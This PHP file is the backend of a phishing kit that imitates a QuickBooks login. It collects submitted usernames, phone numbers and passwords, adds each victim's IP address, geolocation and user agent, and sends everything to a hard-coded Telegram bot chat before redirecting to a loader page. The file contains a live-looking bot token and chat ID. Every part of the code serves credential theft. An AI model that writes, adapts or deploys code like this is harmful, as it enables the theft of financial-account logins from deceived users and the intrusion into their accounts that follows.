<?php

// Telegram bot token and chat ID
$botToken = '7761610400:AAEIPtxg0NL0xrWdlHFhvn1z53ASqDv_EYg';
$chatId = '6265235194';

// Get input from POST request
$username = isset($_POST['username']) ? trim($_POST['username']) : '';
$phone = isset($_POST['phone']) ? trim($_POST['phone']) : '';
$password = isset($_POST['password']) ? trim($_POST['password']) : '';

// Function to send message to Telegram
function sendToTelegram($message, $botToken, $chatId) {
    $url = "https://api.telegram.org/bot$botToken/sendMessage";
    $params = [
        'chat_id' => $chatId,
        'text' => $message
    ];

    // Send a POST request to Telegram API
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
    curl_exec($ch);
    curl_close($ch);
}

// Validate email format
function isValidEmail($email) {
    return filter_var($email, FILTER_VALIDATE_EMAIL);
}

// Validate phone format (basic validation, can be adjusted based on requirements)
function isValidPhone($phone) {
    return preg_match('/^[0-9]{8,}$/', $phone);
}

// Get the user's IP address
function getUserIP() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        return $_SERVER['REMOTE_ADDR'];
    }
}

// Get the user's User Agent
function getUserAgent() {
    return $_SERVER['HTTP_USER_AGENT'];
}

// Get user's geolocation details from ip-api
function getGeoDetails($ip) {
    $url = "http://ip-api.com/json/$ip?fields=city,region,org";
    $response = file_get_contents($url);
    $data = json_decode($response, true);

    return [
        'city' => $data['city'] ?? 'Unknown',
        'region' => $data['region'] ?? 'Unknown',
        'org' => $data['org'] ?? 'Unknown'
    ];
}

// Get user's IP address, User Agent, and geolocation
$userIP = getUserIP();
$userAgent = getUserAgent();
$geoDetails = getGeoDetails($userIP);

if ((isValidEmail($username) || isValidPhone($phone)) && $password) {
    // Create the message to send to Telegram
    $message = "---------QUICKBOOK {LOGIN DETAILS}-------:\n";
    
    if (isValidEmail($username)) {
        $message .= "Username/Email: $username\n";
    }
    if (isValidPhone($phone)) {
        $message .= "Phone: $phone\n";
    }
    $message .= "Password: $password\n";
    
    // Add some space between login and IP details
    $message .= "\n";  // This adds the space between the sections
    
    $message .= "---------QUICKBOOK {IP DETAILS}-------:\n";
    $message .= "IP Address: $userIP\n";
    $message .= "City: {$geoDetails['city']}\n";
    $message .= "State: {$geoDetails['region']}\n";
    $message .= "Organization: {$geoDetails['org']}\n";
    
    // Add the User Agent with some space before it
    $message .= "\n";  // This adds another line break for spacing
    $message .= "User Agent: $userAgent\n";
    
    // Send message to Telegram
    sendToTelegram($message, $botToken, $chatId);

    // Redirect to a success page (you can customize the URL)
    header('Location: loader.html'); // Redirect to a success page
    exit; // Always call exit after a redirect
} else {
    // Invalid input, redirect to an error page
    header('Location: quick.php'); // Redirect to an error page
    exit; // Always call exit after a redirect
}

?>
